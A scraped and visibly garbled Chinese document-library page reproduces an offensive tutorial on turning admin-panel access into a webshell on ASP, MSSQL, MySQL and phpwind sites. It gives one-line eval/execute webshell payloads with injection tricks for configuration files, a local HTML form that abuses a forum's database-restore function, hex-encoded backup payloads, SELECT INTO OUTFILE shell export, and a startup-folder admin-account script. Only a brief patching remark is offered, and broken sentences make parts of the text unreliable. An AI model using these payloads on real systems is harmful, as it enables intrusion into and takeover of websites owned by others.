欢迎来到天天文库
浏览记录
ID:24531175
大小:50.50 KB
页数:4页
时间:2018-11-15
《从后台得到webshell十大技巧大汇总》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库。
1、从后台得到webshell十大技巧大汇总~教育资源库 前言 动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站s/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网
2、5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传BoardLink.asp就是我们想要的shell。 四、利用后台管理向配置文件写ail=hacker263.:evalrequest(chr(35))//,还有一种方法就是写上hacker263.%><%evalrequest(chr(35))%><%',这样就会形成前后对应,最小马也就运行了。<%evalrequest(chr(35))%>可以用lake2的eval发送端以及最新的2006客户端来连,需要说明的是数据库插马时候要选前者。再如动易2005,到文章中心管理-顶部菜单设
3、置-菜单其它特效,插入一句话马%><%executerequest(l)%><%',保存顶部栏目菜单参数设置成功后,我们就得到马地址网站/admin/rootclass_menu_config.asp。 五、利用后台数据库备份及恢复获得sssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其他后缀如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得ssql系统 这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写
4、一个本地提交的表单,代码如下: <formaction=网站/bbs/admin_data.asp?action=RestoreDataact=Restoremethod=post> <p>已上传文件的位置:<inputname=Dbpathtyp12下一页友情提醒:,特别!e=textsize=80></p> <p>要复制到的位置:<inputname=backpathtype=textsize=80></p> <p><inputtype=submitvalue=提交></p></form> 另存为.htm本地执行。把假图片上传路径填在已上传文件的位置那里,
5、想要备份的AT-- 这段代码中,0x626273是要备份的库名bbs的十六进制,可以是其他名字比如bbs.bak;0x3C2565786563757465207265717565737428226C2229253E是<%executerequest(l)%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:ysql系统 后台需要有mysql数据查询功能,我们就可以利用它执行SELECT...INTOOUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的ysql在利用SELECT...
6、INTOOUTFILE语句导出shell。 就可以暴出路径,php环境中比较容易暴出绝对路径:)。提一点的是遇到是mysql在win系统下路径应该这样写。下面的方法是比较常用的一个导出webshell的方法,也可以写个vbs添加系统管理员的脚本导出到启动文件夹,系统重起后就会添加一个管理员帐号 就会在up目录下生成文件名为saiy.php内容为的最小php木马,最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码将会在当前目录生成一个a.php的最小马。 九、phpwind论坛从后台到webshell的三种方式 方式1模板法
7、 进入后台,风格模版设置,在随便一行写代码,记住,这代码必须顶着左边行写,代码前面不可以有任何字符。 方始2脏话过滤法 方式3用户等级管理 以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。 十、也可以利用网站访问计数系统记录来获得webshell 解决方案 由于本文涉及的代码版本很多,所以不可能提供一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补,若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补,可以到相关官方网站下载最新补丁进行修复更新。同时也请大家能时刻关注各大安
此文档下载收益归作者所有